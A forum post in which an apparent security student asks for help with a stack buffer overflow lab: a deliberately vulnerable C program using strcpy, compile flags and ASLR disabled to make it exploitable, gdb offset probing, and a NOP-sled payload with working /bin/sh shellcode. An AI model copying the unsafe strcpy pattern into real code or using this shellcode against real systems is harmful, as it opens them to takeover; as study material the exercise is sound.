Hi guys,
so this post will be a little different and is a pretty fun topic,so as you may or may not know I'm a cyber security/ computer science student,I'm doing a project on buffer overflows and exploit dev showing how buffer overflows can occur with insecure C functions such as strcpy() and gets(), but I seem to be having great difficulty actually executing my shellcode.
I created a vulnerable program named example.c here is the source code below
1 2 3 4 5 6 7 8 9 10 11
|
#include <stdio.h>
#include <string.h>
int main(int argc,char* argv[]){
char buffer[256];
strcpy(buffer,argv[1]);
printf("%s \n", buffer);
return 0;
}
| |
I've been trying to solve this solution for two days. I messaged a friend on reddit who has been helping me out with it and we have managed to make some progress on it, to begin with I'm using a Linux Ubuntu 16.02 64 bit machine, I turned of ASLR as I know without turning this safe guard off the exploit will not work,I also compiled my program as a 32 bit program and turned off the stack protector
here is the compile options I specified gcc -o example -fno-stack-protector -m32 -z execstack example.c
the program compiles fine and I fire up gdb to debug( to learn about how the exploit works) I set a breakpoint just after the strcpy function is called, I then run the program with the following command - run $(python -c "print('A' * 260)") - this is where the seg fault happens and I get the address 0x41414141 this is what I'm looking for but I then try another run to see if it is indeed overwriting the return address,if it is I should get 0x42424242 printed out, so I run $(python -c "print('A' * 256 + 'BBBB')") - negative 0x41414141 is returned again, so I then run the program again same breakpoint and examine the return address with the x/24wx $ebp+4 command this will show me the contents of the return address and nope it has not been overwritten I keep on incrementing until I see the return address is overwritten here is the point in which it does - run $(python -c "print('A' * 268 + 'BBBB')")
http://pasted.co/8d085c99 as you can see by this paste both the ebp and return address have been overwritten but when the program gets a seg fault it returns a normal looking address,it should return 0x42424242 so something strange is happening.
I then decide to try run my shell code anyway run $(python -c "print('\x90' * 222 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x20\xcb\xff\xff')") and something indeed does happen,so the shellcode must be getting executed but not in the correct way ,instead a path shows up and random characters get printed
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1��F1�1�̀�[[1��C��C
�
��S
�����/bin/sh����
Program received signal SIGSEGV, Segmentation fault.
0x0804848f in main ()
|
does anybody have any idea what may be happening and how I can get the exploit to run?
also this is the link to the video I'm following -
https://www.youtube.com/watch?v=hJ8IwyhqzD4
thanks